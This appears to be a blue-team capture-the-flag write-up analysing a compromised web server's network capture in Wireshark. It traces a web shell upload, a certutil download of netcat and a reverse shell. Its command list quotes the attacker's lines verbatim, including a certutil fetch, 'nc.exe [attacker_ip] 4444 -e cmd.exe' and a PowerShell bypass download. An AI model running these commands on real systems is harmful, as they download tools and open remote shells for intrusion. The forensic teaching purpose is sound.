Introduction
One of our web servers triggered an AV alert, but none of the sysadmins say they were logged onto it. We’ve taken a network capture before shutting the server down to take a clone of the disk. Can you take a look at the PCAP and see if anything is up?
In this video walk-through, we covered analyzing a compromised webserver with Wireshark as part of HackTheBox Intro To Blue Team Pathway.
Initial Analysis: Finding the Attacker
The first thing I need to do is open up the PCAP file in Wireshark and get my bearings. The key to this investigation is to look at the HTTP traffic, as this is a web server compromise. By applying a simple http filter in Wireshark, I can quickly identify the key players: the attacker and the web server. I can see the very first GET request, which tells me the attacker’s IP address (ending in .7) and the web server’s IP (ending in .5).
Following the Trail: How the Attacker Got In
Now that I know who’s who, I can dig deeper into the HTTP traffic to see the sequence of events. I’ll use Wireshark’s “Follow TCP Stream” feature to get a clear picture of the conversation between the attacker and the server.
Here’s what I found:
- The attacker first accessed the main page and an image, which is pretty normal behavior.
- Then, things get interesting. The attacker requests and accesses a page called
upload.aspx. This is a big red flag. - Looking at the server’s response to this request, I can see a form for file uploads. The form has a parameter called “operation.”
- The attacker then uploads a file named “cmd” and provides an authentication key of “admin.” This tells me that the attacker likely already had administrative access to the web server. The PCAP probably started after the initial login, as I don’t see the login process itself.
Post-Compromise: What the Attacker Did Next
With the web shell uploaded, the attacker now has a foothold on the server. Here’s what they did next:
- Downloading Tools: The attacker used a command-line tool called
certutilto downloadnetcatfrom their own server. Netcat is a versatile networking tool that can be used for all sorts of things, including creating a reverse shell. - Establishing a Reverse Shell: Once
netcatwas on the victim machine, the attacker executed it to create a reverse shell connection back to their own IP address on port 4444. This gives them a direct command-line interface to the compromised server. - Post-Exploitation Commands: I can see the attacker’s post-compromise activity by filtering the Wireshark traffic for
tcp.port == 4444. I can see them running commands likewhoami(which shows they are running as the web server user) andipconfig. They also tried to download another file using PowerShell andcertutil, but these attempts failed.
Finding the Flag 🚩
The flag for this challenge is cleverly hidden within one of the failed download attempts. It’s encoded in Base32. I simply copied the Base32 string and used a tool called CyberChef to decode it, revealing the flag.
Technical Commands Used
Here’s a list of the commands and filters I used during this investigation:
- Wireshark filter for HTTP traffic:
http - Command to download netcat using certutil:
certutil -urlcache -split -f "http://[attacker_ip]/nc" "C:\Users\Public\nc.exe" - Command to execute netcat for a reverse shell:
C:\Users\Public\nc.exe [attacker_ip] 4444 -e cmd.exe - Wireshark filter for the reverse shell traffic:
tcp.port == 4444 - Post-compromise commands:
whoamiipconfigcd C:\powershell -ep bypass -c "Invoke-WebRequest -Uri http://[attacker_ip]/[base64_encoded_filename] -OutFile C:\Users\Public\file.txt"certutil -urlcache -split -f "http://[attacker_ip]/[base64_encoded_filename]" "C:\Users\Public\file.txt"
